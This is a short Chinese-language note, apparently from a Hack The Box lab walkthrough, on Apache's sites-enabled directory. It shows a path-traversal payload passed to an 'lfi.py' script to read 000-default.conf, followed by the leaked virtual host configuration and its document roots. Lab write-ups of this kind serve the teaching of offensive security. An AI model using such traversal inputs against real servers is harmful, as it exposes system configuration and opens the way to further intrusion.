apache

1. 常见目录

1.1. sites-enabled

/etc/apache2/sites-enabled/目录下,这是 Apache2 已启用虚拟主机配置的目录,通常包含:

/etc/apache2/sites-enabled/
├── 000-default.conf        ← 默认 HTTP (port 80) 虚拟主机├── default-ssl.conf        ← 默认 HTTPS (port 443) 虚拟主机(如果启用了 SSL)
└── hackfail.htb.conf       ← 自定义站点配置(以站点域名命名)

我们可以通过LFI来读取000-default.conf ,这里面可以获取网站的根目录配置信息

┌──(root㉿kali)-[~/Desktop/htb/SYNACKTIV]
└─# python lfi.py ../../../../../../../..//etc/apache2/sites-enabled/000-default.conf


<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html

        ErrorLog /error.log
        CustomLog /access.log combined
</VirtualHost>
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        ServerName dev.hackfail.htb
        DocumentRoot /var/www/blog_dev/public

        <Directory "/var/www/blog_dev/public">
                AllowOverride All
        </Directory>
</VirtualHost>
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        ServerName hackfail.htb
        DocumentRoot /var/www/blog/public

        <Directory "/var/www/blog/public">
                AllowOverride All
        </Directory>
</VirtualHost>
  • DocumentRoot(默认站点): /var/www/html
  • /var/www/blog_dev/public (开发环境站点)
  • /var/www/blog/public (生产环境站点)